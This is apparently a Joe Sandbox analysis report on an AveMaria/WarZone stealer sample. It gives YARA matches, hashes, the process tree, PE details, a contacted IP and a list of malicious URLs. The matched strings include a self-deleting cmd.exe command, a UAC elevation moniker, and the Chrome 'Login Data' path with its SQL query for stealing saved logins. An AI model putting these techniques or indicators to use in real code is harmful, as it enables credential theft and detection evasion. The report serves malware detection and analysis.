http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%VirustotalBrowse
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%VirustotalBrowse
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
https://sectigo.com/CPS0C0%URL Reputationsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.566547321.0012A000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
    00000003.00000003.565700412.0013A000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0xdc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x3bd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0xdc8:$c1: Elevation:Administrator!new:
    • 0x3bd0:$c1: Elevation:Administrator!new:
    00000003.00000003.565700412.0013A000.00000004.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
    • 0xdc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x3bd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0xdc8:$c1: Elevation:Administrator!new:
    • 0x3bd0:$c1: Elevation:Administrator!new:
    00000003.00000002.577725352.00448000.00000002.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0xdf0:$c1: Elevation:Administrator!new:
    00000003.00000002.577725352.00448000.00000002.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
    • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0xdf0:$c1: Elevation:Administrator!new:
    00000000.00000002.424138873.00268000.00000002.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0xdf0:$c1: Elevation:Administrator!new:
    00000000.00000002.424138873.00268000.00000002.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
    • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0xdf0:$c1: Elevation:Administrator!new:
    00000000.00000002.424063177.00230000.00000040.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x1672f:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x1672f:$c1: Elevation:Administrator!new:
    00000000.00000002.424063177.00230000.00000040.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
    • 0x1672f:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x1672f:$c1: Elevation:Administrator!new:
    00000000.00000002.424063177.00230000.00000040.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
      00000003.00000002.577710609.00442000.00000002.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
        00000003.00000003.567703677.0013A000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xdc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x3bd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0xdc8:$c1: Elevation:Administrator!new:
        • 0x3bd0:$c1: Elevation:Administrator!new:
        00000003.00000003.567703677.0013A000.00000004.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
        • 0xdc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x3bd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0xdc8:$c1: Elevation:Administrator!new:
        • 0x3bd0:$c1: Elevation:Administrator!new:
        00000000.00000003.422033804.003DD000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0x5998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x5998:$c1: Elevation:Administrator!new:
        00000000.00000003.422033804.003DD000.00000004.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
        • 0x5998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x5998:$c1: Elevation:Administrator!new:
        00000000.00000003.422033804.003DD000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          00000000.00000003.422009641.003DA000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0x8998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0x8998:$c1: Elevation:Administrator!new:
          00000000.00000003.422009641.003DA000.00000004.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
          • 0x8998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0x8998:$c1: Elevation:Administrator!new:
          00000000.00000003.422009641.003DA000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
            00000003.00000003.567782220.0012C000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
              00000003.00000003.564800575.00130000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
              • 0xadc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
              • 0xdbd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
              • 0xadc8:$c1: Elevation:Administrator!new:
              • 0xdbd0:$c1: Elevation:Administrator!new:
              00000003.00000003.564800575.00130000.00000004.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
              • 0xadc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
              • 0xdbd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
              • 0xadc8:$c1: Elevation:Administrator!new:
              • 0xdbd0:$c1: Elevation:Administrator!new:
              00000003.00000003.564800575.00130000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                00000003.00000002.577668662.00410000.00000040.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
                • 0x1672f:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                • 0x1672f:$c1: Elevation:Administrator!new:
                00000003.00000002.577668662.00410000.00000040.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
                • 0x1672f:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                • 0x1672f:$c1: Elevation:Administrator!new:
                00000003.00000002.577668662.00410000.00000040.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                  00000000.00000002.424120535.00262000.00000002.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                    00000000.00000003.421973490.003CD000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
                    • 0x36a8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                    • 0x15998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                    • 0x36a8:$c1: Elevation:Administrator!new:
                    • 0x15998:$c1: Elevation:Administrator!new:
                    00000000.00000003.421973490.003CD000.00000004.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
                    • 0x36a8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                    • 0x15998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                    • 0x36a8:$c1: Elevation:Administrator!new:
                    • 0x15998:$c1: Elevation:Administrator!new:
                    00000000.00000003.421973490.003CD000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                      Process Memory Space: images.exe PID: 3596JoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                        Process Memory Space: 4ifN8B061M.exe PID: 3380JoeSecurity_AveMariaYara detected AveMaria stealerJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.2.4ifN8B061M.exe.250000.1.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
                          • 0x161f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                          0.2.4ifN8B061M.exe.250000.1.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
                          • 0x161f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                          • 0x161f0:$c1: Elevation:Administrator!new:
                          0.2.4ifN8B061M.exe.250000.1.unpackCodoso_Gh0st_2_RID2C2EDetects Codoso APT Gh0st MalwareFlorian Roth
                          • 0x161f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                          3.2.images.exe.430000.1.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
                          • 0x161f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                          3.2.images.exe.430000.1.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
                          • 0x161f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                          • 0x161f0:$c1: Elevation:Administrator!new:
                          0.2.4ifN8B061M.exe.250000.1.unpackCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
                          • 0x161f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                          • 0x161f0:$c1: Elevation:Administrator!new:
                          3.2.images.exe.430000.1.unpackCodoso_Gh0st_2_RID2C2EDetects Codoso APT Gh0st MalwareFlorian Roth
                          • 0x161f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                          3.2.images.exe.430000.1.unpackCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
                          • 0x161f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                          • 0x161f0:$c1: Elevation:Administrator!new:
                          0.2.4ifN8B061M.exe.250000.1.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                            3.2.images.exe.430000.1.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                              0.2.4ifN8B061M.exe.250000.1.unpackAveMaria_WarZoneunknownunknown
                              • 0x13644:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                              • 0x13514:$str2: MsgBox.exe
                              • 0x136b0:$str4: \System32\cmd.exe
                              • 0x133e8:$str6: Ave_Maria
                              • 0x12620:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              • 0x12000:$str8: SMTP Password
                              • 0x11b50:$str11: \Google\Chrome\User Data\Default\Login Data
                              • 0x125ec:$str12: \sqlmap.dll
                              • 0x11b28:$str14: SELECT * FROM logins
                              • 0x161f0:$str16: Elevation:Administrator!new
                              • 0x16310:$str17: /n:%temp%
                              3.2.images.exe.430000.1.unpackAveMaria_WarZoneunknownunknown
                              • 0x13644:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                              • 0x13514:$str2: MsgBox.exe
                              • 0x136b0:$str4: \System32\cmd.exe
                              • 0x133e8:$str6: Ave_Maria
                              • 0x12620:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              • 0x12000:$str8: SMTP Password
                              • 0x11b50:$str11: \Google\Chrome\User Data\Default\Login Data
                              • 0x125ec:$str12: \sqlmap.dll
                              • 0x11b28:$str14: SELECT * FROM logins
                              • 0x161f0:$str16: Elevation:Administrator!new
                              • 0x16310:$str17: /n:%temp%

                              Sigma Overview

                              No Sigma rule has matched

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              unknownhttps://gardenario.wepbro.com/wp-includes/privata-sezione/interni-5049405216-3JcvOrExSuWC8h/lnvf9373-vw64t721vttv/Get hashmaliciousBrowse
                              • 104.31.64.13
                              https://herbancreativenj.com/minvoice?mail=%Get hashmaliciousBrowse
                              • 104.31.89.17
                              https://herbancreativenj.com/minvoice?mail=%{0:{{Recipient.Email}}}%Get hashmaliciousBrowse
                              • 104.31.88.17
                              http://wp-demo-wp04.vicoders.com/wp-content/mne0e-fl6ho-91193/Get hashmaliciousBrowse
                              • 47.98.241.4
                              https://herbancreativenj.com/minvoice?mail=%{0:{{Recipient.Email}}}%Get hashmaliciousBrowse
                              • 104.31.88.17
                              http://networkscy.incyprus.net/e1dd/bnpr-m7a-4615/Get hashmaliciousBrowse
                              • 104.16.123.96
                              cronGet hashmaliciousBrowse
                              • 45.9.148.125
                              http://cdnus.filesupdatehead.com/ofr/Famofama/01_07_19/Famofama_pages.zipGet hashmaliciousBrowse
                              • 199.115.112.67
                              http://27.69.242.187Get hashmaliciousBrowse
                              • 159.148.172.231
                              http://www2.formatta.com/download/fillersetup.exeGet hashmaliciousBrowse
                              • 40.84.144.206
                              vij.exeGet hashmaliciousBrowse
                              • 139.28.39.70
                              SAMPLE.exeGet hashmaliciousBrowse
                              • 127.0.0.1
                              cronGet hashmaliciousBrowse
                              • 45.9.148.129
                              ze99HWZnJK.exeGet hashmaliciousBrowse
                              • 52.97.183.194
                              https://kbelectricals.co.in/varujy3/ox07-svj-94Get hashmaliciousBrowse
                              • 103.28.36.212
                              http://solarsistem.net/doc/8me4x/*Get hashmaliciousBrowse
                              • 162.241.24.173
                              http://lakewin.org/wp-admin/j19x/*Get hashmaliciousBrowse
                              • 162.241.24.26
                              http://vanguardesigns.com/akbadminton/0412/*Get hashmaliciousBrowse
                              • 162.241.24.179
                              http://nowotnik.com/nqrgo8/cy3a6/'Get hashmaliciousBrowse
                              • 50.87.253.50
                              http://ngiveu.com/hcy5u/icv4/*Get hashmaliciousBrowse
                              • 49.235.41.178

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                              windows-stand

                              Startup

                              • System is w7_1
                              • 4ifN8B061M.exe (PID: 3380 cmdline: 'C:\Users\user\Desktop\4ifN8B061M.exe' MD5: 94FF625253B3920FE5B6824BD8C30482)
                                • images.exe (PID: 3596 cmdline: C:\ProgramData\images.exe MD5: 94FF625253B3920FE5B6824BD8C30482)
                              • images.exe (PID: 3804 cmdline: 'C:\ProgramData\images.exe' MD5: 94FF625253B3920FE5B6824BD8C30482)
                              • cleanup

                              Created / dropped Files

                              C:\ProgramData\images.exe
                              Process:C:\Users\user\Desktop\4ifN8B061M.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Size (bytes):874592
                              Entropy (8bit):4.285697737343411
                              Encrypted:false
                              MD5:94FF625253B3920FE5B6824BD8C30482
                              SHA1:BD2DC8A13C592360AC1E091B397C62AC8574D10A
                              SHA-256:E78E25771A0E710D9CC8B0EF306197AA8BC061D1A1D0282E19A6F3597C7A4E14
                              SHA-512:9BDEAA585730E2CA31F1966D15329A23BBDD6A1560C01C58558B51A21ADDF568DB89D41F9E0F7040393A690E0ACD74EA1EBF97059AAFADE637B864D7C55DAEDA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q..T............f.......f.......f.......G...1...G.......f...4...........G.................!.............Rich....................PE..L...%N.].....................@......b........ ....@.................................#<....@....................................T....0...............:..`....@...;......8...............................@............ ..4............................text............................... ..`.rdata..B.... ......................@..@.data....w.......j..................@....rsrc........0......................@..@.reloc...;...@...<..................@..B........................................................................................................................................................................................................................................................................................................
                              C:\ProgramData\images.exe:Zone.Identifier
                              Process:C:\Users\user\Desktop\4ifN8B061M.exe
                              File Type:ASCII text, with CRLF line terminators
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Reputation:high, very likely benign file
                              Preview: [ZoneTransfer]....ZoneId=0

                              Domains and IPs

                              Contacted Domains

                              No contacted domains info

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s4ifN8B061M.exefalse
                              • 0%, Virustotal, Browse
                              • URL Reputation: safe
                              		low
                              http://crl.thawte.com/ThawteTimestampingCA.crl04ifN8B061M.exefalse
                                		high
                                http://ocsp.sectigo.com04ifN8B061M.exefalse
                                • URL Reputation: safe
                                		unknown
                                https://github.com/syohex/java-simple-mine-sweeperC:4ifN8B061M.exe, 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, images.exe, 00000003.00000003.566547321.0012A000.00000004.00000001.sdmpfalse
                                  		high
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#4ifN8B061M.exefalse
                                  • 0%, Virustotal, Browse
                                  • URL Reputation: safe
                                  		low
                                  http://ocsp.thawte.com04ifN8B061M.exefalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/syohex/java-simple-mine-sweeper4ifN8B061M.exe, images.exefalse
                                    		high
                                    https://sectigo.com/CPS0C4ifN8B061M.exefalse
                                    • URL Reputation: safe
                                    		low

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPCountryFlagASNASN NameMalicious
                                    45.133.183.138
                                    		Romania
                                    		9009unknownfalse

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):4.285697737343411
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:4ifN8B061M.exe
                                    File size:874592
                                    MD5:94ff625253b3920fe5b6824bd8c30482
                                    SHA1:bd2dc8a13c592360ac1e091b397c62ac8574d10a
                                    SHA256:e78e25771a0e710d9cc8b0ef306197aa8bc061d1a1d0282e19a6f3597c7a4e14
                                    SHA512:9bdeaa585730e2ca31f1966d15329a23bbdd6a1560c01c58558b51a21addf568db89d41f9e0f7040393a690e0acd74ea1ebf97059aafade637b864d7c55daeda
                                    SSDEEP:6144:yRhq8lbNztvIYqvNUKfW2Zb7xmuFKK2EikdRupxXqR4XFp:yRhq2vIYqvvW2lxRFKbuRupA4XFp
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q..T............f.......f.......f.......G...1...G.......f...4...........G.................!.............Rich...................

                                    File Icon

                                    Icon Hash:aab2e3e39383aa00

                                    Static PE Info

                                    General

                                    Entrypoint:0x401462
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x5DDA4E25 [Sun Nov 24 09:32:21 2019 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:965b965b72f5b01661f49f8cafb546f0

                                    Authenticode Signature

                                    Signature Valid:true
                                    Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                    Signature Validation Error:The operation completed successfully
                                    Error Number:0
                                    Not Before, Not After
                                    • 11/6/2019 1:00:00 AM 7/25/2020 1:59:59 AM
                                    Subject Chain
                                    • CN="TOV, FAN-CHAI", O="TOV, FAN-CHAI", STREET="Ofis 25, Bud. 13 Vul.Klovsky Uzviz", L=Kyiv, S=Kyiv, PostalCode=01021, C=UA
                                    Version:3
                                    Thumbprint MD5:EFC8F3706CED61C8C3C0EF99A536ECD9
                                    Thumbprint SHA-1:E79EF654B3330B678FC3B4ADB6C2FB721455C4AD
                                    Thumbprint SHA-256:65D22885399551698B87F2DB1351A1A9B8214F6E80B6EF505A21993090D0AA26
                                    Serial:6CB82AC5FF6DE912CF66D257F1BC16F6

                                    Entrypoint Preview

                                    Instruction
                                    call 00007F76ACEDD091h
                                    jmp 00007F76ACEDCC1Fh
                                    push ebp
                                    mov ebp, esp
                                    mov eax, dword ptr [0042B018h]
                                    and eax, 1Fh
                                    push 00000020h
                                    pop ecx
                                    sub ecx, eax
                                    mov eax, dword ptr [ebp+08h]
                                    ror eax, cl
                                    xor eax, dword ptr [0042B018h]
                                    pop ebp
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    mov eax, dword ptr [ebp+08h]
                                    push esi
                                    mov ecx, dword ptr [eax+3Ch]
                                    add ecx, eax
                                    movzx eax, word ptr [ecx+14h]
                                    lea edx, dword ptr [ecx+18h]
                                    add edx, eax
                                    movzx eax, word ptr [ecx+06h]
                                    imul esi, eax, 28h
                                    add esi, edx
                                    cmp edx, esi
                                    je 00007F76ACEDCDBBh
                                    mov ecx, dword ptr [ebp+0Ch]
                                    cmp ecx, dword ptr [edx+0Ch]
                                    jc 00007F76ACEDCDACh
                                    mov eax, dword ptr [edx+08h]
                                    add eax, dword ptr [edx+0Ch]
                                    cmp ecx, eax
                                    jc 00007F76ACEDCDAEh
                                    add edx, 28h
                                    cmp edx, esi
                                    jne 00007F76ACEDCD8Ch
                                    xor eax, eax
                                    pop esi
                                    pop ebp
                                    ret
                                    mov eax, edx
                                    jmp 00007F76ACEDCD9Bh
                                    push esi
                                    call 00007F76ACEDD524h
                                    test eax, eax
                                    je 00007F76ACEDCDC2h
                                    mov eax, dword ptr fs:[00000018h]
                                    mov esi, 004D18E4h
                                    mov edx, dword ptr [eax+04h]
                                    jmp 00007F76ACEDCDA6h
                                    cmp edx, eax
                                    je 00007F76ACEDCDB2h
                                    xor eax, eax
                                    mov ecx, edx
                                    lock cmpxchg dword ptr [esi], ecx
                                    test eax, eax
                                    jne 00007F76ACEDCD92h
                                    xor al, al
                                    pop esi
                                    ret
                                    mov al, 01h
                                    pop esi
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    cmp dword ptr [ebp+08h], 00000000h
                                    jne 00007F76ACEDCDA9h
                                    mov byte ptr [004D18E8h], 00000001h
                                    call 00007F76ACEDD34Ch
                                    call 00007F76ACEDD7B3h
                                    test al, al
                                    jne 00007F76ACEDCDA6h
                                    xor al, al
                                    pop ebp
                                    ret
                                    call 00007F76ACEE12C8h
                                    test al, al
                                    jne 00007F76ACEDCDACh

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x29bdc0x154.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd30000x1e0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xd3a000x1e60
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xd40000x3bc0.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x294800x38.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x294b80x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x220000x234.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x202a50x20400False0.483852652616data6.49296073097IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata0x220000x89420x8a00False0.446359827899data5.34613683148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x2b0000xa77f00xa6a00False0.181593738278DOS executable (block device driver \277DN)3.15265096008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .rsrc0xd30000x1e00x200False0.52734375data4.70189840452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xd40000x3bc00x3c00False0.651692708333data6.57845878967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_MANIFEST0xd30600x17dXML 1.0 document textEnglishUnited States

                                    Imports

                                    DLLImport
                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW
                                    WS2_32.dllhtons, inet_addr, connect, socket, WSAStartup
                                    KERNEL32.dllFindNextFileW, FlushFileBuffers, FlushViewOfFile, GetComputerNameExW, GetConsoleCP, GetConsoleMode, GetCurrentDirectoryW, HeapCreate, PeekNamedPipe, PostQueuedCompletionStatus, SetFileAttributesW, SetFilePointerEx, SetHandleInformation, SetInformationJobObject, Sleep, VirtualAlloc, VirtualAllocEx, FindFirstFileExW, VirtualFreeEx, VirtualProtect, VirtualProtectEx, VirtualQuery, VirtualQueryEx, GetPhysicallyInstalledSystemMemory, QueryPerformanceCounter, FindClose, GetFileType, DeleteFileW, CreateSemaphoreW, CreateEventW, CreateDirectoryW, ConnectNamedPipe, GetProcessHeap, HeapSize, HeapReAlloc, CloseHandle, CreateFileW, WriteConsoleW, FindFirstFileExA, LCMapStringW, VirtualFree, DecodePointer, GetStringTypeW, SetStdHandle, FindNextFileA, HeapFree, HeapAlloc, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetACP, GetCPInfo, GetOEMCP, IsValidCodePage, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW
                                    USER32.dllUnregisterClassW, CreateDesktopW, CloseWindowStation, CloseDesktop, DrawFrameControl
                                    ADVAPI32.dllEventUnregister, ConvertSidToStringSidW, GetTokenInformation, GetKernelObjectSecurity, GetAce, FreeSid, EventWrite, AccessCheck, EventRegister, EqualSid, DuplicateTokenEx, DuplicateToken
                                    SHELL32.dllSHGetKnownFolderPath, SHGetFolderPathW
                                    ADVPACK.dllRebootCheckOnInstallW
                                    dhcpcsvc.DLLMcastApiStartup
                                    gdiplus.dllGdipSetMatrixElements
                                    PROPSYS.dllPropVariantToInt32
                                    TAPI32.dlllineGetAddressCapsA
                                    TRAFFIC.dllTcQueryInterface
                                    VSSAPI.DLLCreateVssBackupComponentsInternal
                                    wevtapi.dllEvtGetPublisherMetadataProperty
                                    WINTRUST.dllCryptCATPersistStore
